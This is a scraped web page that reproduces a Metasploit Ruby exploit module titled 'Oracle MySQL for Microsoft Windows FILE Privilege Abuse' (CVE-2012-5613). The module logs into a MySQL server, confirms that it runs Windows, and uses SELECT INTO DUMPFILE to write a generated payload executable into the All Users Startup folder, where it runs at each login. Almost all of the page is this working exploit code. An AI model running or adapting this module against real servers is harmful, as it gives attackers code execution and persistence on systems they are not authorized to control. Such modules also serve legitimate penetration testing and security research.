扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 |
## # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::MYSQL include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle MySQL for Microsoft Windows FILE Privilege Abuse', 'Description'=> %q{ This module takes advantage of a file privilege misconfiguration problem specifically against Windows MySQL servers. This module abuses the FILE privilege to write a payload to Microsoft's All Users Start Up directory which will execute every time a user logs in. The default All Users Start Up directory used by the module is Windows 7 friendly. }, 'Author' => [ 'sinn3r', 'Sean Verity <veritysr1980[at]gmail.com' ], 'DefaultOptions' => { 'DisablePayloadHandler' =>'true' }, 'License'=> MSF_LICENSE, 'References' => [ ['CVE', '2012-5613'], #DISPUTED ['OSVDB', '88118'], ['EDB', '23083'], ['URL', 'http://seclists.org/fulldisclosure/2012/Dec/13'] ], 'Platform' => 'win', 'Targets'=> [ [ 'MySQL on Windows', { } ] ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Dec 01 2012' )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as']), OptString.new('PASSWORD', [ true, 'The password to authenticate with']), OptString.new('STARTUP_FOLDER', [ true, 'The All Users Start Up folder', '/programdata/microsoft/windows/start menu/programs/startup/']) ]) end def check m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) return Exploit::CheckCode::Safe unless m return Exploit::CheckCode::Appears if is_windows? Exploit::CheckCode::Safe end def peer "#{rhost}:#{rport}" end def query(q) rows = [] begin res = mysql_query(q) return rows unless res res.each_hash do |row| rows << row end rescue RbMysql::ParseError return rows end rows end def is_windows? r = query("SELECT @@version_compile_os;") r[0]['@@version_compile_os'] =~ /^Win/ ? true : false end def get_drive_letter r = query("SELECT @@tmpdir;") drive = r[0]['@@tmpdir'].scan(/^(\w):/).flatten[0] || '' drive end def upload_file(bin, dest) p = bin.unpack("H*")[0] query("SELECT 0x#{p} into DUMPFILE '#{dest}'") end def exploit unless datastore['STARTUP_FOLDER'].start_with?('/') && datastore['STARTUP_FOLDER'].end_with?('/') fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") end print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) rescue RbMysql::AccessDeniedError fail_with(Failure::NoAccess, "#{peer} - Access denied") end fail_with(Failure::NoAccess, "#{peer} - Unable to Login") unless m unless is_windows? fail_with(Failure::NoTarget, "#{peer} - Remote host isn't Windows") end begin drive = get_drive_letter rescue RbMysql::ParseError fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") end fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine drive name") unless drive exe_name = Rex::Text::rand_text_alpha(5) + ".exe" dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" exe= generate_payload_exe print_status("#{peer} - Uploading to '#{dest}'") begin upload_file(exe, dest) rescue RbMysql::AccessDeniedError fail_with(Failure::NotVulnerable, "#{peer} - No permission to write. I blame kc :-)") end register_file_for_cleanup("#{dest}") end end |
体验盒子
